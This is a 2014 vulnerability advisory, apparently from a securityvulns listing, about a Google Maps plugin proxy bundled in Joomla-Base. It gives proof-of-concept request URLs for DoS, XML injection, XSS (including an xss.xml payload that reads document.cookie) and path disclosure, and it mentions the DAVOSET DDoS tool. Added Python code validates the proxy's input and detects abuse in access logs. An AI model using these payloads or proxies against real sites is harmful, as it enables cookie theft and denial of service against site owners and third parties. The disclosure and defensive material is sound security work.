Hello 3APA3A!
These are Denial of Service, XML Injection, Cross-Site Scripting, Full Path Disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base, a package that bundles Joomla with various plugins (and with their vulnerabilities).
These vulnerabilities are in the Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in the Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).
-------------------------
Affected products:
-------------------------
All versions of Joomla-Base that include this plugin are vulnerable.
After I informed the developer, he removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1).
-------------------------
Affected vendors:
-------------------------
Pablo Arias
https://github.com/pabloarias/Joomla-Base
----------
Details:
----------
Denial of Service (WASC-10):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com
The proxy script fetches whatever resource is named in the url parameter without restricting the destination, so every request to it makes the server issue an outbound request to an attacker-chosen host. Besides conducting a DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), which drives many such proxies on different sites at a single target.
XML Injection (WASC-23):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml
The proxy fetches and returns any external XML file named in the url parameter. Because the fetched document is served from the vulnerable site's own origin, this can also be used for an XSS attack with an XML file that embeds XHTML:
XSS via XML Injection (WASC-23):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml
File xss.xml:
<?xml version="1.0" encoding="utf-8"?>
<feed>
 <title>XSS</title>
 <entry>
  <div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
 </entry>
</feed>
Cross-Site Scripting (WASC-08):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E
The value of the url parameter is reflected into the response without encoding, so HTML placed in it is rendered and executed by the browser.
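The checks the proxy script lacks, shown as an added example in Python (this is not the plugin's PHP and not code from the advisory): the url parameter is accepted only when it is an absolute http(s) URL whose parsed host is on an allowlist, a rejected value is HTML-encoded before being reflected in the error, and a missing parameter yields an ordinary 400 instead of a PHP warning. The allowlist hosts, the response header set and the injected fetch callable are assumptions made for illustration; the sample inputs are the advisory's own payloads.

```python
"""Validating the proxy's url parameter and reflecting it safely.

Added example, not code from plugin_googlemap2_proxy.php or from the advisory.
ALLOWED_HOSTS, the header set and the fetch callable are assumptions for illustration.
"""
import html
from typing import Callable, Dict, Tuple
from urllib.parse import urlsplit

# Assumed allowlist: the only upstream hosts a Google Maps proxy needs to reach.
ALLOWED_HOSTS = frozenset({"maps.google.com", "maps.googleapis.com"})
ALLOWED_SCHEMES = frozenset({"http", "https"})


def validate_proxy_url(raw: str) -> Tuple[bool, str]:
    """Return (ok, reason). Only absolute http(s) URLs whose exact parsed host
    is allowlisted pass; every value carried by the advisory's URLs is rejected."""
    if not raw:
        return False, "missing url parameter"
    parts = urlsplit(raw.strip())
    if parts.scheme not in ALLOWED_SCHEMES:
        # Scheme-less values ('google.com', 'site2/xss.xml', '<body onload=...>')
        # and non-HTTP schemes (file://, gopher://) all stop here.
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        # http://maps.google.com@attacker.example/ parses with hostname attacker.example
        return False, "credentials in URL not allowed"
    host = (parts.hostname or "").lower()
    # Compare the parsed host exactly; a substring or prefix test would accept
    # maps.google.com.attacker.example or attacker.example/?maps.google.com.
    if host not in ALLOWED_HOSTS:
        return False, "host not allowed"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port not in (None, 80, 443):
        return False, "port not allowed"
    return True, "ok"


def error_response(raw: str, reason: str) -> str:
    """Error body with the rejected value HTML-encoded before reflection
    (the original script reflects it raw, which is the WASC-08 finding)."""
    return "<p>Rejected proxy target: %s (%s)</p>" % (html.escape(raw), html.escape(reason))


def proxied_response_headers() -> Dict[str, str]:
    """Defence in depth for the upstream body. The allowlist is the real control;
    these headers only limit what a script in a fetched XHTML-in-XML document could do."""
    return {
        "Content-Type": "application/xml; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # A sandboxed document runs in an opaque origin with scripts disabled.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def handle_request(params: Dict[str, str],
                   fetch: Callable[[str], str]) -> Tuple[int, Dict[str, str], str]:
    """Model of the endpoint. params is the already-decoded query (like $_GET);
    fetch(url) -> body is the upstream HTTP client, injected so the example runs
    offline, and it is only ever called on a validated URL."""
    raw = params.get("url", "")
    ok, reason = validate_proxy_url(raw)
    if not ok:
        # A missing parameter is an ordinary 400, not a PHP warning, so nothing
        # about the server's filesystem leaks (the WASC-13 finding).
        return 400, {"Content-Type": "text/html; charset=utf-8"}, error_response(raw, reason)
    return 200, proxied_response_headers(), fetch(raw)


if __name__ == "__main__":
    for payload in ("google.com", "site2/xss.xml",
                    "<body onload=alert(document.cookie)>", "",
                    "http://maps.google.com.attacker.example/", "https://maps.google.com/maps"):
        print(repr(payload), validate_proxy_url(payload))
```

Note that the exact-host comparison is what the domain restriction added to the plugin in version 3.2 would need in order to hold; the advisory reports that restriction as bypassable but does not spell out the method, so the comparison here is a general hardening rule rather than a fix for that specific bypass.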
Full path disclosure (WASC-13):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php
Calling the script without the url parameter triggers a PHP warning. With the corresponding PHP settings (display_errors enabled, so warnings are shown in the response), the warning discloses the absolute filesystem path of the script.
Insufficient Anti-automation (WASC-21):
The proxy has no reliable protection (such as rate limiting) against automated requests, which is also what makes the automated DoS and DDoS attacks above easy to run.
Also, in my third advisory concerning the Google Maps plugin, I wrote about a bypass of the built-in domain restriction functionality and described a method of bypassing the protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA.
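For a site that still carries the plugin, the DoS section above and the anti-automation section here can at least be detected from the web server's access log. The following Python is an added example, not from the advisory or the plugin: it parses Apache combined-format lines, keeps only hits on plugin_googlemap2_proxy.php, and raises three kinds of alert: a client exceeding a request rate on the proxy (automation), one upstream host being fetched many times through the proxy (use as a reflector), and url values that are not absolute http(s) URLs (probes such as the advisory's payloads). The log lines, client addresses and thresholds are constructed for illustration.

```python
"""Detecting abuse of the Google Maps proxy endpoint in access logs.

Added example (not from the advisory or the plugin). SAMPLE_LOG is constructed
to mimic Apache combined format; RATE_LIMIT, WINDOW_SECONDS and REFLECTION_LIMIT
are assumed thresholds.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

PROXY_PATH = "/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php"
RATE_LIMIT = 5          # assumed: more proxy hits than this per client per window is automation
WINDOW_SECONDS = 60
REFLECTION_LIMIT = 5    # assumed: more proxied fetches than this of one upstream host

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one client hammering the proxy at a third-party host, one
# scanner sending the advisory's XSS and FPD requests, and one ordinary visitor.
SAMPLE_LOG = "\n".join(
    ['203.0.113.5 - - [04/May/2014:10:00:%02d +0000] "GET %s?url=http://victim.example/big.iso '
     'HTTP/1.1" 200 10485760 "-" "Mozilla/5.0"' % (i, PROXY_PATH) for i in range(8)]
    + ['198.51.100.7 - - [04/May/2014:10:01:00 +0000] "GET %s?url=%%3Cbody%%20onload=alert(document.cookie)%%3E '
       'HTTP/1.1" 200 312 "-" "Mozilla/5.0"' % PROXY_PATH,
       '198.51.100.7 - - [04/May/2014:10:01:01 +0000] "GET %s HTTP/1.1" 200 290 "-" "Mozilla/5.0"' % PROXY_PATH,
       '192.0.2.9 - - [04/May/2014:10:05:00 +0000] "GET %s?url=http://maps.google.com/maps '
       'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"' % PROXY_PATH,
       '192.0.2.9 - - [04/May/2014:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"']
)


def parse_proxy_hits(log_text: str) -> List[Dict]:
    """Return one record per request that hit the proxy script."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        req = urlsplit(m["target"])
        if req.path != PROXY_PATH:
            continue
        raw_url = parse_qs(req.query).get("url", [""])[0]   # percent-decoded
        upstream = urlsplit(raw_url)
        hits.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "url": raw_url,
            "upstream_host": (upstream.hostname or "").lower(),
            "absolute_http": upstream.scheme in ("http", "https") and bool(upstream.hostname),
        })
    return hits


def max_hits_in_window(timestamps: List[datetime], window_seconds: int) -> int:
    """Largest number of timestamps falling inside any window of the given length."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while (ts[end] - ts[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(hits: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (kind, subject, detail) alerts for automation, reflection and probes."""
    alerts = []
    by_ip = defaultdict(list)
    fetches_per_host = Counter()
    for h in hits:
        by_ip[h["ip"]].append(h["ts"])
        if h["absolute_http"]:
            fetches_per_host[h["upstream_host"]] += 1
        else:
            # Scheme-less or HTML-bearing values are scanner/exploit traffic, not map data.
            alerts.append(("probe", h["ip"], "url=%r" % h["url"]))
    for ip, stamps in by_ip.items():
        n = max_hits_in_window(stamps, WINDOW_SECONDS)
        if n > RATE_LIMIT:
            alerts.append(("automation", ip, "%d proxy requests within %ds" % (n, WINDOW_SECONDS)))
    for host, n in fetches_per_host.items():
        if n > REFLECTION_LIMIT:
            alerts.append(("reflection", host, "%d fetches proxied to this host" % n))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_proxy_hits(SAMPLE_LOG)):
        print(alert)
```

The reflection alert is the one worth forwarding to an abuse contact: from a single site's log it shows the site being used as one node of a DAVOSET-style attack, and the upstream host it names is the actual victim.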
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
{"id": "SECURITYVULNS:DOC:30603", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Multiple vulnerabilities in Joomla-Base", "description": "\r\nHello 3APA3A!\r\n\r\nThese are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is package of Joomla with different plugins (with their vulnerabilities).\r\n \r\nThese vulnerabilities are in Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).\r\n \r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n \r\nVulnerable are all versions of Joomla-Base, which includes this plugin.\r\n \r\nAfter my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1).\r\n \r\n-------------------------\r\nAffected vendors:\r\n-------------------------\r\n \r\nPablo Arias\r\nhttps://github.com/pabloarias/Joomla-Base\r\n \r\n----------\r\nDetails:\r\n----------\r\n \r\nDenial of Service (WASC-10):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com\r\n \r\nBesides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).\r\n \r\nXML Injection (WASC-23):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml\r\n \r\nIt's possible to include external xml-files. 
Which also can be used for XSS attack:\r\n \r\nXSS via XML Injection (WASC-23):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml\r\n \r\nFile xss.xml:\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<feed>\r\n <title>XSS</title>\r\n <entry>\r\n <div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>\r\n </entry>\r\n</feed>\r\n \r\nCross-Site Scripting (WASC-08):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E\r\n \r\nFull path disclosure (WASC-13):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php\r\n \r\nThis is possible with corresponding PHP settings, when warnings are shown.\r\n \r\nInsufficient Anti-automation (WASC-21):\r\n \r\nIn this functionality there is no reliable protection from automated requests.\r\n \r\nAlso in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA. 
\r\n \r\nBest wishes & regards,\r\nEugene Dokukin aka MustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "published": "2014-05-04T00:00:00", "modified": "2014-05-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30603", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:52", "viewCount": 246, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13714"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 1.4}, "_state": {"dependencies": 1678962961, "score": 1684016453, "affected_software_major_version": 0, "epss": 1679323282}, "_internal": {"score_hash": "9da5bf5d94c4f3c7fb594a5395d131dc"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}